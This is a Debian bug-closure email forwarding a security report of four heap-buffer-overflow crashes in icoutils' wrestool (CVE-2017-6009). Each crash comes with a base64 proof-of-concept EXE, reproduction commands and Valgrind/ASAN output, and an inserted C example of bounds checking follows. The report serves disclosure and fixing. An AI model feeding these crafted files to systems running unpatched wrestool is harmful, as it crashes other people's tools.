Your message dated Tue, 07 Mar 2017 22:34:21 +0000
with message-id <e1clngt-0006di...@fasolo.debian.org>
and subject line Bug#854050: fixed in icoutils 0.31.2-1
has caused the Debian Bug report #854050,
regarding icoutils: CVE-2017-6009
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
854050: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=854050
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: icoutils
Version: 0.31.1
Tags: security upstream
---------- Forwarded message ----------
From: op7ic \x00 <op7...@gmail.com>
Date: Fri, Feb 3, 2017 at 1:13 PM
Subject: Buffer Overflows in wrestool (part of icoutils-0.31.1 package).
To: Frank Richter <frank.rich...@gmail.com>, Oskar Liljeblad
<os...@osk.mine.nu>, sub...@bugs.debian.org
Hi guys,
I wanted to report a few more crashes in wrestool. They are mostly
related to boundary checks on operations such as memcpy etc.
Please see attached reports.
Cheers,
op7ic
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz
Description:
A heap-based buffer overflow was observed in "calc_vma_size" function in
"restable.c" source file. This issue can be triggered by processing a corrupted
exe file and will result in wrestool crash.
To replicate this issue use the attached sample below and execute the following
command:
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
PoC file (base64 encoded):
TVoAAFBFAABM/v8AdXNlcjMyAAAAUEX/AHVzZXIzMgAAAFBFAADp//8kAAIACwFrZQIAAAAAUEUA
AABQRQAAAAAA/38AUEUAAAAAAFBFAAAAAgAAAAQAAAA=
Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
Valgrind Output:
valgrind /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l /tmp/PoC.exe
==23339== Memcheck, a memory error detector
==23339== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==23339== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==23339== Command: /home/ico-target/icoutils-clean/wrestool/wrestool -l
/home/ico-target/icoutils-0.31.1/wretool-output/crashes/PoC.exe
==23339==
==23339== Invalid read of size 2
==23339== at 0x4034D0: calc_vma_size (restable.c:490)
==23339== by 0x4034D0: read_library (restable.c:421)
==23339== by 0x401827: main (main.c:322)
==23339== Address 0x51e19f9 is 0 bytes after a block of size 89 alloc'd
==23339== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==23339== by 0x406408: xmalloc (xmalloc.c:41)
==23339== by 0x4017F9: main (main.c:315)
==23339==
/home/ico-target/icoutils-clean/wrestool/wrestool:
/home/ico-target/icoutils-0.31.1/wretool-output/crashes/PoC.exe: premature end
==23339== Argument 'size' of function realloc has a fishy (possibly negative)
value: -1
==23339== at 0x4C2AF2E: realloc (vg_replace_malloc.c:692)
==23339== by 0x406465: xrealloc (xmalloc.c:61)
==23339== by 0x4033DA: read_library (restable.c:426)
==23339== by 0x401827: main (main.c:322)
==23339==
/home/ico-target/icoutils-clean/wrestool/wrestool: memory exhausted
==23339==
==23339== HEAP SUMMARY:
==23339== in use at exit: 657 bytes in 2 blocks
==23339== total heap usage: 45 allocs, 43 frees, 10,019 bytes allocated
==23339==
==23339== LEAK SUMMARY:
==23339== definitely lost: 0 bytes in 0 blocks
==23339== indirectly lost: 0 bytes in 0 blocks
==23339== possibly lost: 0 bytes in 0 blocks
==23339== still reachable: 657 bytes in 2 blocks
==23339== suppressed: 0 bytes in 0 blocks
==23339== Rerun with --leak-check=full to see details of leaked memory
==23339==
==23339== For counts of detected and suppressed errors, rerun with: -v
==23339== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
ASAN Report (needs to be compiled with -fsanitize=address):
==10056==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x60800000bf79 at pc 0x4129fe bp 0x73424dec2ae0 sp 0x73424dec2ad8
READ of size 2 at 0x60800000bf79 thread T0
#0 0x4129fd in calc_vma_size
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:490
#1 0x4129fd in read_library
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:421
#2 0x403109 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:322
#3 0x64abe35deb44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#4 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)
0x60800000bf79 is located 0 bytes to the right of 89-byte region
[0x60800000bf20,0x60800000bf79)
allocated by thread T0 here:
#0 0x64abe39bc73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x42e290 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41
SUMMARY: AddressSanitizer: heap-buffer-overflow
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:490 calc_vma_size
Shadow bytes around the buggy address:
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==10056==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz
Description:
A buffer overflow was observed in the "decode_ne_resource_id" function in the
"restable.c" source file. This is happening because the "len" parameter for the memcpy
operation is not checked for size and thus becomes a negative integer in the
process, resulting in a failed memcpy operation. This issue can be triggered by
processing a corrupted exe file and will result in a wrestool crash.
To replicate this issue use the attached sample below and execute the following
command:
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
PoC file (base64 encoded):
TkUAIAABAAh1c2VySQAAAAAAAAAAAAQAAAAAAAIACwFr//9/AQAAgAAAABAAAAAAAAAAIAAAAAAA
AAIAAAAAAA==
Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
Valgrind Output:
==13487== Memcheck, a memory error detector
==13487== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==13487== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==13487== Command: /home/ico-target/icoutils-clean/wrestool/wrestool -l PoC.exe
==13487==
==13487== Invalid write of size 8
==13487== at 0x402629: decode_ne_resource_id (restable.c:235)
==13487== by 0x40287A: list_ne_type_resources (restable.c:338)
==13487== by 0x40287A: list_resources (restable.c:365)
==13487== by 0x402C28: do_resources_recurs (restable.c:80)
==13487== by 0x402F2E: do_resources (restable.c:60)
==13487== by 0x40189F: main (main.c:339)
==13487== Address 0x51e1da7 is 9 bytes before a block of size 280 alloc'd
==13487== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==13487== by 0x406408: xmalloc (xmalloc.c:41)
==13487== by 0x4027F4: list_ne_type_resources (restable.c:327)
==13487== by 0x4027F4: list_resources (restable.c:365)
==13487== by 0x402C28: do_resources_recurs (restable.c:80)
==13487== by 0x402F2E: do_resources (restable.c:60)
==13487== by 0x40189F: main (main.c:339)
==13487==
==13487== Invalid read of size 8
==13487== at 0x40262E: decode_ne_resource_id (restable.c:235)
==13487== by 0x40287A: list_ne_type_resources (restable.c:338)
==13487== by 0x40287A: list_resources (restable.c:365)
==13487== by 0x402C28: do_resources_recurs (restable.c:80)
==13487== by 0x402F2E: do_resources (restable.c:60)
==13487== by 0x40189F: main (main.c:339)
==13487== Address 0x51e19da is 58 bytes inside a block of size 64 alloc'd
==13487== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==13487== by 0x406408: xmalloc (xmalloc.c:41)
==13487== by 0x4017F9: main (main.c:315)
==13487==
==13487==
==13487== Process terminating with default action of signal 11 (SIGSEGV)
==13487== Bad permissions for mapped region at address 0x55E0000
==13487== at 0x40262E: decode_ne_resource_id (restable.c:235)
==13487== by 0x40287A: list_ne_type_resources (restable.c:338)
==13487== by 0x40287A: list_resources (restable.c:365)
==13487== by 0x402C28: do_resources_recurs (restable.c:80)
==13487== by 0x402F2E: do_resources (restable.c:60)
==13487== by 0x40189F: main (main.c:339)
==13487==
==13487== HEAP SUMMARY:
==13487== in use at exit: 1,752 bytes in 4 blocks
==13487== total heap usage: 35 allocs, 31 frees, 5,455 bytes allocated
==13487==
==13487== LEAK SUMMARY:
==13487== definitely lost: 0 bytes in 0 blocks
==13487== indirectly lost: 0 bytes in 0 blocks
==13487== possibly lost: 0 bytes in 0 blocks
==13487== still reachable: 1,752 bytes in 4 blocks
==13487== suppressed: 0 bytes in 0 blocks
==13487== Rerun with --leak-check=full to see details of leaked memory
==13487==
==13487== For counts of detected and suppressed errors, rerun with: -v
==13487== ERROR SUMMARY: 1046502 errors from 2 contexts (suppressed: 0 from 0)
Segmentation fault
ASAN Report (needs to be compiled with -fsanitize=address):
==1056==ERROR: AddressSanitizer: unknown-crash on address 0x61200000bec0 at pc
0x40c433 bp 0x72ccfb544270 sp 0x72ccfb544268
WRITE of size 18446744073709551615 at 0x61200000bec0 thread T0
#0 0x40c432 in decode_ne_resource_id
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:235
#1 0x40c432 in list_ne_type_resources
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:338
#2 0x40c432 in list_resources
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:365
#3 0x40d550 in do_resources_recurs
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:80
#4 0x40e758 in do_resources
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:60
#5 0x403182 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:339
#6 0x6e7fedb36b44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)
0x61200000bec0 is located 0 bytes inside of 280-byte region
[0x61200000bec0,0x61200000bfd8)
allocated by thread T0 here:
#0 0x6e7fedf1473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x42e290 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41
SUMMARY: AddressSanitizer: unknown-crash
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:235 decode_ne_resource_id
Shadow bytes around the buggy address:
==1056==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz
Description:
A heap-based buffer overflow was observed in "do_resources_recurs" function in
"restable.c" source file. This issue can be triggered by processing a corrupted
exe file and will result in wrestool crash.
To replicate this issue use the attached sample below and execute the following
command:
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
PoC file (base64 encoded):
TkUAAEwBAAh1c2VySQAAAAAAAAAAAAQAAAAAAAIACwFr//8AAAABAAAAABAAAAAAAAAAIAAAAAAA
AAIAAAAAAA==
Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
Valgrind Output:
valgrind /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l /tmp/PoC.exe
==16526== Memcheck, a memory error detector
==16526== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==16526== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==16526== Command: /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l
/tmp/PoC.exe
==16526==
==16526== Invalid read of size 4
==16526== at 0x402D4C: do_resources_recurs (restable.c:100)
==16526== by 0x402F2E: do_resources (restable.c:60)
==16526== by 0x40189F: main (main.c:339)
==16526== Address 0x51e1ec0 is 208 bytes inside an unallocated block of size
4,186,608 in arena "client"
==16526==
==16526==
==16526== HEAP SUMMARY:
==16526== in use at exit: 0 bytes in 1 blocks
==16526== total heap usage: 35 allocs, 34 frees, 5,175 bytes allocated
==16526==
==16526== LEAK SUMMARY:
==16526== definitely lost: 0 bytes in 1 blocks
==16526== indirectly lost: 0 bytes in 0 blocks
==16526== possibly lost: 0 bytes in 0 blocks
==16526== still reachable: 0 bytes in 0 blocks
==16526== suppressed: 0 bytes in 0 blocks
==16526== Rerun with --leak-check=full to see details of leaked memory
==16526==
==16526== For counts of detected and suppressed errors, rerun with: -v
==16526== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
ASAN Report (needs to be compiled with -fsanitize=address):
=================================================================
==1753==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef00
at pc 0x40e630 bp 0x772c846e54d0 sp 0x772c846e54c8
READ of size 4 at 0x60200000ef00 thread T0
#0 0x40e62f in do_resources_recurs
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:100
#1 0x40e758 in do_resources
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:60
#2 0x403182 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:339
#3 0x6a3f991c9b44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#4 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)
0x60200000ef00 is located 4 bytes to the right of 12-byte region
[0x60200000eef0,0x60200000eefc)
allocated by thread T0 here:
#0 0x6a3f995a773f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x6a3f99229989 in strdup (/lib/x86_64-linux-gnu/libc.so.6+0x81989)
SUMMARY: AddressSanitizer: heap-buffer-overflow
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:100 do_resources_recurs
Shadow bytes around the buggy address:
==1753==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz
Description:
A heap-based buffer overflow was observed in "read_library" function in
"restable.c" source file. This issue can be triggered by processing a corrupted
exe file and will result in wrestool crash.
Note: similar crashes appear on lines 429 and 445 in the same function. They have
pretty much the same root cause.
To replicate this issue use the attached sample below and execute the following
command:
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
PoC file (base64 encoded):
S18AAFBFAABMAQAAZQAAAAAAEAAAAAAAAID/AADp/x3/fw==
Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe
Valgrind Output:
valgrind /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l /tmp/PoC.exe
==17351== Memcheck, a memory error detector
==17351== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==17351== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==17351== Command: /fuzz/ico-target/icoutils-clean/wrestool/wrestool -l PoC.exe
==17351==
==17351== Invalid read of size 4
==17351== at 0x40324B: read_library (restable.c:392)
==17351== by 0x401827: main (main.c:322)
==17351== Address 0x51e19dc is 12 bytes after a block of size 48 in arena
"client"
==17351==
==17351== Invalid read of size 4
==17351== at 0x40326D: read_library (restable.c:393)
==17351== by 0x401827: main (main.c:322)
==17351== Address 0x51e19dc is 12 bytes after a block of size 48 in arena
"client"
==17351==
==17351== Invalid read of size 4
==17351== at 0x40329B: read_library (restable.c:414)
==17351== by 0x401827: main (main.c:322)
==17351== Address 0x51e19dc is 12 bytes after a block of size 48 in arena
"client"
==17351==
/home/ico-target/icoutils-clean/wrestool/wrestool: PoC.exe: not a PE or NE
library
==17351==
==17351== HEAP SUMMARY:
==17351== in use at exit: 0 bytes in 0 blocks
==17351== total heap usage: 43 allocs, 43 frees, 9,859 bytes allocated
==17351==
==17351== All heap blocks were freed -- no leaks are possible
==17351==
==17351== For counts of detected and suppressed errors, rerun with: -v
==17351== ERROR SUMMARY: 3 errors from 3 contexts (suppressed: 0 from 0)
ASAN Report (needs to be compiled with -fsanitize=address):
==28110==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x60400000dfcc at pc 0x412c03 bp 0x7515a6f88940 sp 0x7515a6f88938
READ of size 4 at 0x60400000dfcc thread T0
#0 0x412c02 in read_library
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:392
#1 0x403109 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:322
#2 0x6fdd0327fb44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#3 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)
0x60400000dfcc is located 4 bytes to the left of 33-byte region
[0x60400000dfd0,0x60400000dff1)
allocated by thread T0 here:
#0 0x6fdd0365d73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x6fdd0328c9b0 (/lib/x86_64-linux-gnu/libc.so.6+0x2e9b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:392 read_library
Shadow bytes around the buggy address:
==28110==ABORTING
--- End Message ---
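Added example, not part of the original report and not icoutils code: a small length-prefixed name reader showing the class of check the report above says is missing, next to the arithmetic that turns an unchecked length byte into the 18446744073709551615-byte copy ASAN logged. The record layout, buffer contents and function names are constructed for illustration, and reading the length through a signed char is an assumed cause, not one confirmed by the report.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed inputs for illustration; these are not the PoC files. */
static const unsigned char sample_ok[]  = { 'N', 'E', 0, 0, 4, 'I', 'C', 'O', 'N' };
static const unsigned char sample_bad[] = { 'N', 'E', 0, 0, 0xFF, 'I', 'C' };

/* True when [off, off + need) lies inside a file of file_size bytes.
 * Two comparisons, so off + need is never computed and cannot wrap. */
int range_ok(size_t file_size, size_t off, size_t need)
{
    return off <= file_size && need <= file_size - off;
}

/* Fixed-width field read: refuses a 2-byte read that would start at or
 * run past the end of the buffer (the "0 bytes after a block" case). */
int read_u16_le(const unsigned char *file, size_t file_size, size_t off,
                uint16_t *out)
{
    if (!range_ok(file_size, off, 2))
        return -1;
    *out = (uint16_t)(file[off] | (file[off + 1] << 8));
    return 0;
}

/* Size memcpy would receive if the length byte were read through a signed
 * char and used unchecked (assumed cause): 0xFF becomes -1, then SIZE_MAX. */
size_t unchecked_copy_len(const unsigned char *file, size_t off)
{
    signed char len = (signed char)file[off];
    return (size_t)len;
}

/* Hardened read of a name stored as <1-byte length><bytes> at file[off].
 * Returns the name length, or -1 if the record does not fit in the file
 * or in dst (including the terminating NUL). */
int read_name(const unsigned char *file, size_t file_size, size_t off,
              char *dst, size_t dst_size)
{
    size_t len;

    if (dst_size == 0 || !range_ok(file_size, off, 1))
        return -1;                       /* length byte itself is out of range */
    len = file[off];                     /* unsigned: always 0..255 */
    if (!range_ok(file_size, off + 1, len) || len >= dst_size)
        return -1;                       /* payload overruns source or dest */
    memcpy(dst, file + off + 1, len);
    dst[len] = '\0';
    return (int)len;
}

int main(void)
{
    char id[16];
    int n = read_name(sample_ok, sizeof sample_ok, 4, id, sizeof id);

    printf("well-formed record: %d (%s)\n", n, n >= 0 ? id : "rejected");
    printf("oversized length:   %d\n",
           read_name(sample_bad, sizeof sample_bad, 4, id, sizeof id));
    printf("unchecked copy len: %zu\n", unchecked_copy_len(sample_bad, 4));
    return 0;
}
```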
--- Begin Message ---
Source: icoutils
Source-Version: 0.31.2-1
We believe that the bug you reported is fixed in the latest version of
icoutils, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 854...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Colin Watson <cjwat...@debian.org> (supplier of updated icoutils package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Tue, 07 Mar 2017 22:18:53 +0000
Source: icoutils
Binary: icoutils
Architecture: source
Version: 0.31.2-1
Distribution: unstable
Urgency: high
Maintainer: Colin Watson <cjwat...@debian.org>
Changed-By: Colin Watson <cjwat...@debian.org>
Description:
icoutils - Create and extract MS Windows icons and cursors
Closes: 854050 854054
Changes:
icoutils (0.31.2-1) unstable; urgency=high
.
* New upstream release.
- CVE-2017-6009, CVE-2017-6010, CVE-2017-6011: Various security fixes
from Martin Gieseking, issues found by Jerzy Kramarz (closes: #854050,
#854054).
--- End Message ---